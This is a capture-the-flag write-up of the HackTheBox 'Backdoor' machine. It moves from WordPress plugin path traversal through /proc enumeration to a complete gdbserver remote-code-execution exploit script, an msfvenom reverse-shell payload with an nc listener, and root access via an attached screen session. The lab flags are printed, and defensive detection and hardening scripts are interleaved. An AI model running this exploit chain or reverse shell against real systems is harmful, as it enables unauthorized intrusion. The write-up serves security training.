Hackthebox - Backdoor

Target information

Target type

Information gathering

First, scan all ports with nmap.

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 20:41 EST
Nmap scan report for 10.10.11.125
Host is up (0.39s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/21%OT=22%CT=1%CU=33566%PV=Y%DS=2%DC=T%G=Y%TM=619AF5
OS:A4%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=100%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=101%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   492.34 ms loaclhost (10.10.14.1)
2   492.34 ms 10.10.11.125

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.37 seconds

From the output we can see that the target runs WordPress 5.8.1 as its CMS. Let's run wpscan against it and, at the same time, check whether any known vulnerabilities exist.

┌──(root💀kali)-[~/Desktop]
└─# wpscan --url 10.10.11.125 --enumerate vp,u,vt,tt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sun Nov 21 20:55:16 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:30 <====================================================================================================================================> (358 / 358) 100.00% Time: 00:00:30
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:04:14 <==================================================================================================================================> (2575 / 2575) 100.00% Time: 00:04:14

[i] No Timthumbs Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:03 <======================================================================================================================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 21 21:00:23 2021
[+] Requests Done: 2976
[+] Cached Requests: 18
[+] Data Sent: 836.808 KB
[+] Data Received: 721.12 KB
[+] Memory used: 297.57 MB
[+] Elapsed time: 00:05:07

The scan did not turn up much useful information: no plugins or themes were detected, but we did learn that the administrator account is named admin.

┌──(root💀kali)-[~/Desktop]
└─# searchsploit WordPress 5.8.1
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                                                                                                               | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                                                                                                                         | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                                                                                                                       | php/webapps/48918.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The search does return three results, but all of them are plugin vulnerabilities and we cannot yet tell whether those plugins are installed. Let's first take a look at the website itself.

Clicking Home redirects to http://backdoor.htb/, which cannot be reached, so add backdoor.htb to the hosts file and visit it again.

After adding the entry, a quick look around reveals nothing of interest, so let's brute-force paths instead.

┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e -t 50 -u http://backdoor.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://backdoor.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/11/21 21:15:59 Starting gobuster in directory enumeration mode
===============================================================
http://backdoor.htb/wp-content           (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
http://backdoor.htb/wp-includes          (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
http://backdoor.htb/wp-admin             (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]   
http://backdoor.htb/server-status        (Status: 403) [Size: 277]                                       

===============================================================
2021/11/21 21:47:17 Finished
===============================================================

Exploitation

Still nothing much, which makes this a bit tricky. We will have to browse manually, starting with wp-content.

wp-content is a blank page, so I kept browsing by hand based on experience (I was working over mobile data, so more brute-forcing would have been too expensive; judgment calls it is).

http://backdoor.htb/wp-content/plugins/ does have content, and directory listing is enabled on it.

ebook-download should be a WordPress plugin; let's look inside.

The only file with any content is readme.txt, so let's open it.

It is confirmed to be a plugin, so let's search exploit-db for vulnerabilities.

https://www.exploit-db.com/exploits/39575

And we do find one.

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

This is an arbitrary file download vulnerability; let's download a configuration file to check.

The vulnerability is confirmed and exploitable. Let's take the database password and see whether it also works for logging in as the admin user.
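As an added illustration (not the plugin's code, which is not reproduced on this page), the following Python contrasts the naive join that produces this kind of arbitrary file read with a hardened resolver that confines every request to the plugin directory. The PLUGIN_DIR value and the function names are assumptions made for the example; the ebookdownloadurl values are the ones used on this page.

```python
import posixpath
from typing import Optional

# Assumed install location for the example; the real path is not on this page.
PLUGIN_DIR = "/var/www/html/wp-content/plugins/ebook-download"


def vulnerable_resolve(ebookdownloadurl: str) -> str:
    """Naive join: the caller's '../' segments walk straight out of the plugin directory.

    This is the pattern behind the arbitrary file download above, written as a
    constructed illustration rather than the plugin's own code.
    """
    return posixpath.normpath(posixpath.join(PLUGIN_DIR, ebookdownloadurl))


def hardened_resolve(ebookdownloadurl: str, base_dir: str = PLUGIN_DIR) -> Optional[str]:
    """Return an absolute path inside base_dir, or None if the request escapes it.

    Rejects NUL bytes and backslashes, absolute paths (which posixpath.join would
    honour verbatim) and any normalised result outside base_dir.  A production
    handler should additionally call os.path.realpath so symlinks are resolved.
    """
    if "\0" in ebookdownloadurl or "\\" in ebookdownloadurl:
        return None
    if posixpath.isabs(ebookdownloadurl):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, ebookdownloadurl))
    # Compare against base_dir plus a separator so "ebook-download-evil" is not accepted.
    prefix = base_dir.rstrip("/") + "/"
    if candidate != base_dir and not candidate.startswith(prefix):
        return None
    return candidate


if __name__ == "__main__":
    for value in ("readme.txt", "../../../wp-config.php", "/proc/self/cmdline"):
        print(f"{value!r}: naive -> {vulnerable_resolve(value)}, hardened -> {hardened_resolve(value)}")
```

The naive version maps ../../../wp-config.php to the web root, exactly the file read shown above; the hardened version returns None for it and for any absolute path, while still serving files that live under the plugin directory.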

Well, that was naive of me: the password cannot be used directly, so we still need another way to get at the database.

Then inspiration struck: maybe the breakthrough is port 1337, the one we could not read anything from? But if we cannot read from port 1337, how do we find out which service it is?

There is a way.

Use the WordPress plugin's LFI (local file inclusion) to read the port information. Let's get to it.

Read /proc/pid/cmdline like this, where pid is a variable number; based on testing, the range should be somewhere between 900 and 1000.

So set it up like this and start brute-forcing.

There we go: there is a gdbserver service, and testing shows it is listening on port 1337, which can be exploited.
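Added example, not from the original post: a small detector for Apache access logs that flags ebookdownloadurl values containing traversal sequences, absolute paths or /proc reads, and counts hits per source so that the burst of /proc/<pid>/cmdline requests described above stands out. The log lines are constructed for the example; the request path and parameter name are the ones on this page.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not taken from the box's logs).
SAMPLE_LOG = """\
10.10.14.23 - - [21/Nov/2021:21:30:01 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3155 "-" "Mozilla/5.0"
10.10.14.23 - - [21/Nov/2021:21:31:10 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/900/cmdline HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.23 - - [21/Nov/2021:21:31:11 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2Fproc%2F901%2Fcmdline HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.23 - - [21/Nov/2021:21:31:12 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/902/cmdline HTTP/1.1" 200 57 "-" "Mozilla/5.0"
192.168.1.5 - - [21/Nov/2021:21:32:00 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=book.pdf HTTP/1.1" 200 48210 "-" "Mozilla/5.0"
192.168.1.7 - - [21/Nov/2021:21:33:00 -0500] "GET /index.php/feed/ HTTP/1.1" 200 1500 "-" "curl/7.74"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PROC_RE = re.compile(r"^/proc/(\d+|self)/")


def classify(target: str):
    """Reason string if the request abuses ebookdownloadurl, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/filedownload.php"):
        return None
    for raw in parse_qs(parts.query).get("ebookdownloadurl", []):
        value = unquote(raw)  # parse_qs decoded once; decode again to catch double encoding
        if ".." in value.split("/"):
            return "path traversal"
        if PROC_RE.match(value):
            return "procfs read"
        if value.startswith("/"):
            return "absolute path"
    return None


def scan(log_text: str):
    """Return (ip, timestamp, reason, decoded target) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m["target"])
        if reason:
            hits.append((m["ip"], m["ts"], reason, unquote(m["target"])))
    return hits


def burst_sources(hits, threshold: int = 3):
    """Sources with at least `threshold` flagged requests: the process-enumeration signature."""
    counts = defaultdict(int)
    for ip, *_ in hits:
        counts[ip] += 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("enumeration sources:", burst_sources(found))
```

A real deployment would feed the live access log through scan() and alert on burst_sources(); the threshold is deliberately low because legitimate use of the download endpoint never needs a leading slash or a ".." segment at all.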

We also found something interesting.

Look at that: we have not even got a shell yet and we have already scooped up root's stuff. Unbelievable.

https://www.exploit-db.com/exploits/50539

Here we found a gdbserver RCE exploit; let's go.

First, save the exploit locally.

Step 1

# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver   ->  10.10.10.200:1337
- Attacker's listener  ->  10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''

def checksum(s: str) -> str:
    # GDB remote serial protocol checksum: modulo-256 sum of the packet body,
    # always sent as two hex digits. The published version used '2x', which pads
    # with a space instead of a zero for sums below 0x10 and yields an invalid packet.
    res = sum(map(ord, s)) % 256
    return f'{res:02x}'

def ack(sock):
    sock.send(b'+')

def send(sock, s: str) -> str:
    # Frame the body as $<body>#<checksum>, read the reply and acknowledge it
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()

def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')  # switch gdbserver to extended mode

    try:
        # Single-step once; the stop reply carries the program counter register
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        sys.exit(1)

    if arch == '10':
        print('[+] Found x64 arch')
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr
    else:
        # Without this branch `addr` would be undefined below for any other register id
        print(f'[!] ERROR: Unsupported architecture register id {arch}')
        sys.exit(1)

    hex_length = hex(len(payload))[2:]

    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')

def main():
    if len(sys.argv) < 3:
        print(help)
        exit(1)

    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]

    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')

if __name__ == '__main__':
    main()
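Added example, not part of the exploit or of gdb itself: a parser for the GDB remote serial protocol framing used above that validates each packet's two-digit checksum and flags memory-write (M/X) packets followed by a resume, which is the sequence a monitor watching a network-exposed gdbserver should alert on. It also shows the zero-padded checksum format the exploit's checksum() needs. The captured stream and the address in the M packet are constructed for the example.

```python
import re


def rsp_checksum(body: bytes) -> str:
    """Modulo-256 sum of the packet body as two lowercase hex digits.

    The zero padding matters: a '2x' style format emits ' 5' instead of '05'
    for sums below 0x10 and the peer rejects the packet.
    """
    return f"{sum(body) % 256:02x}"


def rsp_frame(body: str) -> bytes:
    """Wrap a packet body as $<body>#<checksum>."""
    raw = body.encode()
    return b"$" + raw + b"#" + rsp_checksum(raw).encode()


# A packet is '$' body '#' two hex digits; '+' / '-' acknowledgements sit between packets.
PACKET_RE = re.compile(rb"\$([^#]*)#([0-9a-fA-F]{2})")


def parse_stream(data: bytes):
    """Split a captured byte stream into (body, checksum_ok) tuples."""
    packets = []
    for m in PACKET_RE.finditer(data):
        body, given = m.group(1), m.group(2).decode().lower()
        packets.append((body.decode(errors="replace"), rsp_checksum(body) == given))
    return packets


def flag_packets(packets):
    """Return (body, reason) pairs a monitor should alert on.

    'M' and 'X' packets write target memory; a 'vCont;c' (continue) after such a
    write is how injected code gets executed, so that sequence is flagged.
    gdbserver has no authentication, so anyone who can reach the port can send these.
    """
    alerts = []
    saw_write = False
    for body, ok in packets:
        if not ok:
            alerts.append((body, "bad checksum"))
        elif body[:1] in ("M", "X"):
            saw_write = True
            alerts.append((body, "memory write"))
        elif body.startswith("vCont;c") and saw_write:
            alerts.append((body, "resume after write"))
    return alerts


# Constructed client-side stream following the same packet sequence as the exploit above.
SAMPLE_STREAM = b"".join([
    rsp_frame("qSupported:multiprocess+;qRelocInsn+;qvCont+;"), b"+",
    rsp_frame("!"), b"+",
    rsp_frame("vCont;s"), b"+",
    rsp_frame("M00005555555551a0,4:00000000"), b"+",  # constructed address, four zero bytes
    rsp_frame("vCont;c"),
])

if __name__ == "__main__":
    for body, reason in flag_packets(parse_stream(SAMPLE_STREAM)):
        print(f"{reason}: {body}")
```

Pointed at the client-to-server payload of a capture on the gdbserver port, the same two functions give a compact detection for the memory-write-then-continue pattern; the mitigation is simpler still, since gdbserver should only ever listen on localhost or over an SSH tunnel.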

Step 2

Then generate a reverse-shell payload with msfvenom.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.23 LPORT=4444 PrependFork=true -o rev.bin

Step 3

Listen on a local port with nc.

nc -nvlp 4444

Step 4

Run the exploit.

┌──(root💀kali)-[~/Desktop]
└─# python3 exploit.py 10.10.11.125:1337 rev.bin                                          1 ⨯
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

And a shell comes back.

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444   
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.125] 50626
whoami&&id
user
uid=1000(user) gid=1000(user) groups=1000(user)

Upgrade to an interactive shell with python3.

python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$

user@Backdoor:/home/user$ ls
ls
user.txt
user@Backdoor:/home/user$ cat user.txt  
cat user.txt
10ba3c92228d369cea03eec58f58420c

User flag obtained.

Privilege escalation

Remember the screen process we saw earlier? That is the key to privilege escalation, and it only takes two commands.

export TERM=xterm
screen -x root/root

And we are root.
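Added example, not from the post: a local audit that reports the two conditions this escalation relies on, a setuid screen binary and a live root screen session socket under the screen run directory. Both paths are parameters; demo() builds a constructed layout in a temporary directory so the script runs without touching the real system, and the session socket name 1337.root is made up for the example.

```python
import os
import stat
import tempfile


def audit_screen(run_dir: str, screen_bin: str):
    """List conditions that let a low-privileged user attach to root's screen session.

    run_dir    - screen's socket directory (normally /run/screen or /var/run/screen)
    screen_bin - path to the screen binary (normally /usr/bin/screen)
    Returns a list of finding strings; an empty list means nothing notable.
    """
    findings = []
    try:
        st = os.stat(screen_bin)
        # Multiuser attach across accounts (screen -x user/session) needs a setuid screen.
        if st.st_mode & stat.S_ISUID:
            findings.append(f"{screen_bin} is setuid (owner uid {st.st_uid}); "
                            "multiuser attach across accounts is possible")
    except FileNotFoundError:
        pass
    root_dir = os.path.join(run_dir, "S-root")
    if os.path.isdir(root_dir):
        # Socket names are <pid>.<session name>; the post attaches to root/root.
        for name in sorted(os.listdir(root_dir)):
            findings.append(f"root screen session socket: {os.path.join(root_dir, name)}")
    return findings


def demo():
    """Audit a constructed layout in a temporary directory (the real system is not touched)."""
    with tempfile.TemporaryDirectory() as tmp:
        run_dir = os.path.join(tmp, "run", "screen")
        os.makedirs(os.path.join(run_dir, "S-root"))
        open(os.path.join(run_dir, "S-root", "1337.root"), "w").close()
        screen_bin = os.path.join(tmp, "screen")
        open(screen_bin, "w").close()
        os.chmod(screen_bin, 0o4755)  # setuid bit on a file we own, for illustration only
        return audit_screen(run_dir, screen_bin)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, run audit_screen("/run/screen", "/usr/bin/screen"); a setuid screen alongside an S-root directory is the combination to remove, either by dropping the setuid bit or by making sure root never leaves a multiuser session open.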

root@Backdoor:~# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

Successfully escalated to root.

root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
692be0661cb8d3c7cdf05379c93b9e8c

Root flag obtained.